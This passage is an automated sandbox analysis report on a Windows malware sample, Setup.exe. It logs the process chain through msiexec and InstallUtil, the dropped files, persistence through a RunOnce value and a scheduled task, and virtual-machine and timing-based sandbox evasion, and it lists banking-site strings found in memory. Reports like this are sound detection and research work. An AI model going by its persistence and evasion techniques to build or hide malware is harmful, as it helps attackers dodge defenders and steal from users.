          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_00313BA0 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,5_2_00313BA0
          Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Users\user\AppData\Roaming\7LUEA3.pifJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6412:120:WilError_03
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMutant created: \Sessions\1\BaseNamedObjects\Global\3630303063323963626363656234323637316431343330633561326137373663
          Source: C:\Users\user\Desktop\Setup.exeFile created: C:\Users\user\AppData\Local\Temp\dfc85a81Jump to behavior
          Source: C:\Users\user\Desktop\Setup.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Users\user\Desktop\Setup.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Users\user\Desktop\Setup.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: Setup.exeReversingLabs: Detection: 29%
          Source: InstallUtil.exeString found in binary or memory: ent map read and map writeruntime: failed to decommit pages/cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sc
          Source: InstallUtil.exeString found in binary or memory: ent map read and map writeruntime: failed to decommit pages/cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sc
          Source: InstallUtil.exeString found in binary or memory: than maximum page size (runtime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on
          Source: InstallUtil.exeString found in binary or memory: than maximum page size (runtime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on
          Source: InstallUtil.exeString found in binary or memory: C:/Program Files/Go/src/net/addrselect.go
          Source: Setup.exeString found in binary or memory: step-start
          Source: Setup.exeString found in binary or memory: auto-start-reverse
          Source: Setup.exeString found in binary or memory: marker-start
          Source: C:\Users\user\Desktop\Setup.exeFile read: C:\Users\user\Desktop\Setup.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\Setup.exe "C:\Users\user\Desktop\Setup.exe"
          Source: C:\Users\user\Desktop\Setup.exeProcess created: C:\Windows\SysWOW64\choice.exe C:\Windows\SysWOW64\choice.exe
          Source: C:\Windows\SysWOW64\choice.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\choice.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Users\user\AppData\Roaming\7LUEA3.pif "C:\Users\user\AppData\Roaming\7LUEA3.pif" "C:\Users\user\AppData\Roaming\SPL3UE.xlsx"
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
          Source: C:\Users\user\Desktop\Setup.exeProcess created: C:\Windows\SysWOW64\choice.exe C:\Windows\SysWOW64\choice.exeJump to behavior
          Source: C:\Windows\SysWOW64\choice.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exeJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Users\user\AppData\Roaming\7LUEA3.pif "C:\Users\user\AppData\Roaming\7LUEA3.pif" "C:\Users\user\AppData\Roaming\SPL3UE.xlsx"Jump to behavior
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeJump to behavior
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeJump to behavior
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeJump to behavior
          Source: C:\Users\user\Desktop\Setup.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\Setup.exeSection loaded: acgenral.dllJump to behavior
          Source: C:\Users\user\Desktop\Setup.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\Setup.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Users\user\Desktop\Setup.exeSection loaded: samcli.dllJump to behavior
          Source: C:\Users\user\Desktop\Setup.exeSection loaded: msacm32.dllJump to behavior
          Source: C:\Users\user\Desktop\Setup.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\Setup.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\Setup.exeSection loaded: dwmapi.dllJump to behavior
          Source: C:\Users\user\Desktop\Setup.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\Desktop\Setup.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Users\user\Desktop\Setup.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\Setup.exeSection loaded: winmmbase.dllJump to behavior
          Source: C:\Users\user\Desktop\Setup.exeSection loaded: winmmbase.dllJump to behavior
          Source: C:\Users\user\Desktop\Setup.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\Desktop\Setup.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\Desktop\Setup.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\Desktop\Setup.exeSection loaded: wtsapi32.dllJump to behavior
          Source: C:\Users\user\Desktop\Setup.exeSection loaded: shfolder.dllJump to behavior
          Source: C:\Users\user\Desktop\Setup.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\Setup.exeSection loaded: iconcodecservice.dllJump to behavior
          Source: C:\Users\user\Desktop\Setup.exeSection loaded: windowscodecs.dllJump to behavior
          Source: C:\Users\user\Desktop\Setup.exeSection loaded: winsta.dllJump to behavior
          Source: C:\Users\user\Desktop\Setup.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\Desktop\Setup.exeSection loaded: shdocvw.dllJump to behavior
          Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\choice.exeSection loaded: mi.dllJump to behavior
          Source: C:\Windows\SysWOW64\choice.exeSection loaded: miutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\choice.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\choice.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\choice.exeSection loaded: mstask.dllJump to behavior
          Source: C:\Windows\SysWOW64\choice.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\choice.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\choice.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\choice.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\SysWOW64\choice.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: shdocvw.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: webio.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifSection loaded: wsock32.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifSection loaded: version.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifSection loaded: winmm.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifSection loaded: mpr.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\choice.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32Jump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: Setup.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
          Source: Setup.exeStatic file information: File size 8060800 > 1048576
          Source: Setup.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x52c400
          Source: Setup.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x191e00
          Source: Setup.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
          Source: Binary string: tapiperf.pdb source: choice.exe, 00000002.00000002.1281913157.0000000005C60000.00000004.00001000.00020000.00000000.sdmp, msiexec.exe, msiexec.exe, 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmp, cbaxoydi.2.dr
          Source: Binary string: tapiperf.pdbGCTL source: choice.exe, 00000002.00000002.1281913157.0000000005C60000.00000004.00001000.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmp, cbaxoydi.2.dr
          Source: Binary string: wntdll.pdbUGP source: Setup.exe, 00000000.00000002.1210135833.0000000004359000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.1213765321.0000000004FF0000.00000004.00000800.00020000.00000000.sdmp, 7LUEA3.pif, 0000000C.00000002.1716809720.0000000009A94000.00000004.00001000.00020000.00000000.sdmp, 7LUEA3.pif, 0000000C.00000003.1618543385.00000000098F4000.00000004.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: Setup.exe, 00000000.00000002.1210135833.0000000004359000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.1213765321.0000000004FF0000.00000004.00000800.00020000.00000000.sdmp, 7LUEA3.pif, 0000000C.00000002.1716809720.0000000009A94000.00000004.00001000.00020000.00000000.sdmp, 7LUEA3.pif, 0000000C.00000003.1618543385.00000000098F4000.00000004.00001000.00020000.00000000.sdmp
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: 12_2_01559BED VirtualAlloc,LoadLibraryA,GetProcAddress,GetProcAddress,12_2_01559BED
          Source: Setup.exeStatic PE information: real checksum: 0x78fab0 should be: 0x7b42be
          Source: cbaxoydi.2.drStatic PE information: real checksum: 0x0 should be: 0x4cbe0
          Source: Setup.exeStatic PE information: section name: .didata
          Source: cbaxoydi.2.drStatic PE information: section name: rua
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_00309F54 push es; mov dword ptr [esp], eax5_2_00309F5C
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_06188548 push ecx; ret 5_2_0618855B
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: 12_2_01557145 push 01557171h; ret 12_2_01557169
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: 12_2_0155717D push 015571A9h; ret 12_2_015571A1
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: 12_2_0155710D push 01557139h; ret 12_2_01557131
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: 12_2_015571ED push 01557219h; ret 12_2_01557211
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: 12_2_0154318D push 015431B9h; ret 12_2_015431B1
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: 12_2_015571B5 push 015571E1h; ret 12_2_015571D9
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: 12_2_0154A071 push 0154A09Dh; ret 12_2_0154A095
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: 12_2_01553035 push 015530E0h; ret 12_2_015530D8
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: 12_2_01553033 push 015530E0h; ret 12_2_015530D8
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: 12_2_015530E5 push 01553175h; ret 12_2_0155316D
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: 12_2_015570B5 push 01557101h; ret 12_2_015570F9
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: 12_2_0155A341 push 0155A367h; ret 12_2_0155A35F
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: 12_2_0155A301 push 0155A335h; ret 12_2_0155A32D
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: 12_2_0155A309 push 0155A335h; ret 12_2_0155A32D
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: 12_2_015553D1 push 015553FDh; ret 12_2_015553F5
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: 12_2_0154939F push 015497EDh; ret 12_2_015497E5
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: 12_2_01555399 push 015553C5h; ret 12_2_015553BD
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: 12_2_0155725D push 01557289h; ret 12_2_01557281
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: 12_2_0155725B push 01557289h; ret 12_2_01557281
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: 12_2_0155527D push 015552A9h; ret 12_2_015552A1
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: 12_2_015562F1 push 0155636Eh; ret 12_2_01556366
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: 12_2_015562EF push 0155636Eh; ret 12_2_01556366
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: 12_2_01557295 push 015572C1h; ret 12_2_015572B9
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: 12_2_01559281 push 015592ADh; ret 12_2_015592A5
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: 12_2_0155A2AE push 0155A335h; ret 12_2_0155A32D
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: 12_2_01555509 push 01555535h; ret 12_2_0155552D
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: 12_2_01555441 push 0155546Dh; ret 12_2_01555465
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: 12_2_01555479 push 015554A5h; ret 12_2_0155549D
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: 12_2_01558479 push 015584A5h; ret 12_2_0155849D

          Persistence and Installation Behavior

          barindex
          Drops PE files with a suspicious file extension
          Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Users\user\AppData\Roaming\7LUEA3.pifJump to dropped file
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifFile created: C:\dfbffdd\AutoIt3.exeJump to dropped file
          Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Users\user\AppData\Roaming\7LUEA3.pifJump to dropped file
          Source: C:\Windows\SysWOW64\choice.exeFile created: C:\Users\user\AppData\Local\Temp\cbaxoydiJump to dropped file
          Source: C:\Windows\SysWOW64\choice.exeFile created: C:\Users\user\AppData\Local\Temp\cbaxoydiJump to dropped file
          Source: C:\Windows\SysWOW64\choice.exeFile created: C:\Windows\Tasks\ROG Live Service.jobJump to behavior
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce cbdaghfJump to behavior
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce cbdaghfJump to behavior
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce cbdaghfJump to behavior
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce cbdaghfJump to behavior

          Hooking and other Techniques for Hiding and Protection

          barindex
          Found hidden mapped module (file has been removed from disk)
          Source: C:\Windows\SysWOW64\choice.exeModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\CBAXOYDI
          Source: C:\Users\user\Desktop\Setup.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Setup.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Setup.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Query firmware table information (likely to detect VMs)
          Source: C:\Windows\SysWOW64\msiexec.exeSystem information queried: FirmwareTableInformationJump to behavior
          Switches to a custom stack to bypass stack traces
          Source: C:\Users\user\Desktop\Setup.exeAPI/Special instruction interceptor: Address: 76F17C44
          Source: C:\Users\user\Desktop\Setup.exeAPI/Special instruction interceptor: Address: 76F17945
          Source: C:\Windows\SysWOW64\choice.exeAPI/Special instruction interceptor: Address: 76F13B54
          Source: C:\Windows\SysWOW64\msiexec.exeAPI/Special instruction interceptor: Address: 23BC87
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\Setup.exeRDTSC instruction interceptor: First address: 76F1F3E1 second address: 76F1F3FD instructions: 0x00000000 rdtsc 0x00000002 mov dword ptr [ebp-20h], eax 0x00000005 mov dword ptr [ebp-1Ch], edx 0x00000008 lea esi, dword ptr [ebp-38h] 0x0000000b xor eax, eax 0x0000000d xor ecx, ecx 0x0000000f cpuid 0x00000011 mov dword ptr [esi], eax 0x00000013 mov dword ptr [esi+04h], ebx 0x00000016 mov dword ptr [esi+08h], ecx 0x00000019 mov dword ptr [esi+0Ch], edx 0x0000001c rdtsc
          Source: C:\Users\user\Desktop\Setup.exeRDTSC instruction interceptor: First address: 76F1F3FD second address: 76F1F3E1 instructions: 0x00000000 rdtsc 0x00000002 mov dword ptr [ebp-18h], eax 0x00000005 mov dword ptr [ebp-14h], edx 0x00000008 mov eax, dword ptr [ebp-18h] 0x0000000b sub eax, dword ptr [ebp-20h] 0x0000000e mov ecx, dword ptr [ebp-14h] 0x00000011 sbb ecx, dword ptr [ebp-1Ch] 0x00000014 add eax, dword ptr [ebp-10h] 0x00000017 adc ecx, dword ptr [ebp-0Ch] 0x0000001a mov dword ptr [ebp-10h], eax 0x0000001d mov dword ptr [ebp-0Ch], ecx 0x00000020 jmp 00007FC08111F045h 0x00000022 mov edx, dword ptr [ebp-04h] 0x00000025 add edx, 01h 0x00000028 mov dword ptr [ebp-04h], edx 0x0000002b cmp dword ptr [ebp-04h], 64h 0x0000002f jnl 00007FC08111F0D0h 0x00000031 rdtsc
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: 12_3_09CA9AE8 rdtscp 12_3_09CA9AE8
          Source: C:\Windows\SysWOW64\choice.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\cbaxoydiJump to dropped file
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6632Thread sleep time: -240000s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: PhysicalDrive0Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_0619855F FindFirstFileExW,5_2_0619855F
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: 12_2_015447DD FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,12_2_015447DD
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: 12_2_0154210D GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,12_2_0154210D
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: 12_2_015448E5 FindFirstFileA,GetLastError,12_2_015448E5
          Source: msiexec.exe, 00000005.00000003.1327888406.00000000065E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696584680t
          Source: msiexec.exe, 00000005.00000003.1327888406.00000000065E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696584680
          Source: choice.exe, 00000002.00000002.1280387098.00000000055D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: http://www.vmware.com/0
          Source: msiexec.exe, 00000005.00000003.1327888406.00000000065E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696584680p
          Source: msiexec.exe, 00000005.00000003.1327888406.00000000065E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696584680^
          Source: msiexec.exe, 00000005.00000003.1327888406.00000000065E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696584680n
